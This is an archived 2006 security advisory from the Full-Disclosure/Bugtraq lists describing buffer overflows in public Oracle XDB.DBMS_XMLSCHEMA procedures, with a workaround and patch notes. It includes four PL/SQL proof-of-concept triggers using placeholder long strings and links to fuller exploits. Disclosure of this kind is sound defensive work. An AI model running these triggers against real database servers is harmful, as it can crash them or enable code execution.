lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060126223034.19069.qmail@web54413.mail.yahoo.com>
Date: Thu, 26 Jan 2006 14:30:34 -0800 (PST)
From: Cesar <cesarc56@...oo.com>
To: bugtraq@...urityfocus.com, ntbugtraq@...tserv.ntbugtraq.com,
	vulnwatch@...nwatch.org, full-disclosure@...ts.grok.org.uk
Subject: [Argeniss] Oracle Database Buffer overflows
	vulnerabilities in public procedures of XDB.DBMS_XMLSCHEMA{_INT}


Argeniss Security Advisory


Name:  Oracle Database Buffer overflows
vulnerabilities in public procedures of
XDB.DBMS_XMLSCHEMA{_INT}
Affected Software:  Oracle Database Server versions
9iR2 and 10gR1
Severity:  High
Remote exploitable:  Yes (Authentication to Database
Server is needed)
Credits:  Esteban Martínez Fayó
Date:  1/26/2006
Advisory Number:  ARG010601


Details: 
Oracle Database Server provides the DBMS_XMLSCHEMA and
DBMS_XMLSCHEMA_INT Packages that include procedures to
register and delete XML schemas.
These packages contain the public procedures
GENERATESCHEMA and GENERATESCHEMAS that are vulnerable
to buffer overflow attacks.

By default XDB.DBMS_XMLSCHEMA{_INT} has EXECUTE
permission to PUBLIC so any Oracle database user can
exploit this vulnerability.
Exploitation of this vulnerability allows an attacker
to execute arbitrary code. It can also be exploited to
cause DOS (Denial of service) killing Oracle server
process. 


To reproduce the vulnerabilities execute the next
PL/SQL:


SELECT
XDB.DBMS_XMLSCHEMA.GENERATESCHEMA('LongStringHere',
'OrLongStringHere') from dual;



SELECT
XDB.DBMS_XMLSCHEMA.GENERATESCHEMAS('LongStringHere',
'OrLongStringHere') from dual;



DECLARE
  a SYS.XMLTYPE; -- return value
BEGIN
  a := XDB.DBMS_XMLSCHEMA_INT.GENERATESCHEMA
('LongStringHere', 'OrLongStringHere', '', FALSE,
FALSE, FALSE);
END;



DECLARE
 a SYS.XMLSEQUENCETYPE; -- return value
BEGIN
  a := XDB.DBMS_XMLSCHEMA_INT.GENERATESCHEMAS
('LongStringHere', 'OrLongStringHere', '', '', FALSE,
FALSE);
END;



PoC Exploits:
http://www.argeniss.com/research/OraGENERATESCHEMAExploits.txt


Vendor Status:
Vendor was contacted and a patch was released.


Workaround:
Restrict access to the XDB.DBMS_XMLSCHEMA and
XDB.DBMS_XMLSCHEMA_INT packages.


Patch Available:
Apply Oracle Critical Patch Update January 2006
available at Oracle Metalink.


Links:
http://www.argeniss.com/research/ARGENISS-ADV-010601.txt
http://www.oracle.com/technology/deploy/security/pdf/cpujan2006.html



Argeniss - Information Security
*Application Security Experts*
http://www.argeniss.com

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ